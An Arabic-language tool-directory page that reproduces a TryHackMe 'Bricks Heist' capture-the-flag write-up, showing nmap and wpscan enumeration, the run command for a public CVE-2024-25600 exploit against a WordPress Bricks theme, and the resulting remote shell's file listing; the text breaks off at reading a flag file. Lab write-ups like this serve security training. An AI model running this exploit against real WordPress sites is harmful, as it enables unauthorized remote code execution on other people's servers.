Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
TryHack3M-Bricks-Heist — تقرير حل تحدي TryHackMe CTF — ثغرة RCE في ووردبريس عبر CVE-2024-25600، تحليل جنائي لعملات التعدين الخبيثة، وتحديد مجموعة برمجيات الفدية LockBit | Kitploit
أدوات/GitHubGitHub/anjai7/tryhack3m-bricks-heist
الاستخبارات مفتوحة المصدر (OSINT)تحليل الثغرات الأمنيةاستغلال تطبيقات الويبالتحقيق الجنائي الرقميتحليل البرمجيات الخبيثةالتحاليل الرقمية الجنائيةCTFالتعلم والتعليم
GitHubanjai7/tryhack3m-bricks-heist

TryHack3M-Bricks-Heist

تقرير حل تحدي TryHackMe CTF — ثغرة RCE في ووردبريس عبر CVE-2024-25600، تحليل جنائي لعملات التعدين الخبيثة، وتحديد مجموعة برمجيات الفدية LockBit

عرض المستودع
60منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

target:10.201.6.98 التعداد

nmap -A 10.201.6.98

image نظرًا لوجود ووردبريس باسم "brick by brick" واسم هذه الغرفة هو brick، فمن المحتمل أن نجد ثغرة هنا لذا دعنا نعدد ووردبريس

wpscan --url https://bricks.thm --disable-tls-checks

التشغيل مع فحوصات TLS لن يعمل image هنا إشارة أخرى إلى brick، دعنا نرى إذا كان لهذا القالب أي ثغرة ابحث عن ثغرة bricks 1.9.5 وسترى RCE وفي الغرفة يمكنك رؤية RCE CVE كمفتاح، لذا فمن المحتمل أن يكون هذا المسار الصحيح CVE

CVE-2024-25600 https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT استخدمت الكود من هذا المستودع

python CVE-2024-25600.py --url https://bricks.thm --threads 10

تحتاج أيضًا إلى تثبيت بعض الوحدات

  1. alive_progress
  2. bs4
  3. prompt_toolkit
  4. requests
  5. rich قم بتثبيتها باستخدام pip أو pip3 install، وإذا لم تتمكن من التثبيت، قم بإنشاء بيئة python تشغيل الأمر أعلاه يعطينا قشرة RCE image ثم يمكننا الحصول على الإجابة الأولى
Shell> ls -la  
total 260  
drwxr-xr-x  7 apache apache  4096 Aug  9 12:34 .  
drwxr-xr-x  3 root   root    4096 Apr  2  2024 ..  
-rw-r--r--  1 apache apache   523 Apr  2  2024 .htaccess  
-rw-r--r--  1 root   root      43 Apr  5  2024 650c844110baced87e1606453b93f22a.txt  
-rw-r--r--  1 apache apache   405 Apr  2  2024 index.php  
drwxr-xr-x  7 apache apache  4096 Apr 12  2023 kod  
-rw-r--r--  1 apache apache 19915 Apr  4  2024 license.txt  
drwxr-xr-x 15 apache apache  4096 Apr  2  2024 phpmyadmin  
-rw-r--r--  1 apache apache  7401 Apr  4  2024 readme.html  
-rw-r--r--  1 apache apache  7387 Apr  4  2024 wp-activate.php  
drwxr-xr-x  9 apache apache  4096 Apr  2  2024 wp-admin  
-rw-r--r--  1 apache apache   351 Apr  2  2024 wp-blog-header.php  
-rw-r--r--  1 apache apache  2323 Apr  2  2024 wp-comments-post.php  
-rw-r--r--  1 apache apache  3012 Apr  4  2024 wp-config-sample.php  
-rw-rw-rw-  1 apache apache  3288 Apr  2  2024 wp-config.php  
drwxr-xr-x  6 apache apache  4096 Aug  9 12:34 wp-content  
-rw-r--r--  1 apache apache  5638 Apr  2  2024 wp-cron.php  
drwxr-xr-x 30 apache apache 16384 Apr  4  2024 wp-includes  
-rw-r--r--  1 apache apache  2502 Apr  2  2024 wp-links-opml.php  
-rw-r--r--  1 apache apache  3927 Apr  2  2024 wp-load.php  
-rw-r--r--  1 apache apache 50917 Apr  4  2024 wp-login.php  
-rw-r--r--  1 apache apache  8525 Apr  2  2024 wp-mail.php  
-rw-r--r--  1 apache apache 28427 Apr  4  2024 wp-settings.php  
-rw-r--r--  1 apache apache 34385 Apr  2  2024 wp-signup.php  
-rw-r--r--  1 apache apache  4885 Apr  2  2024 wp-trackback.php  
-rw-r--r--  1 apache apache  3246 Apr  4  2024 xmlrpc.php  

Shell> cat 650c844110baced87e1606453b93f22a.txt
تنزيل الأداة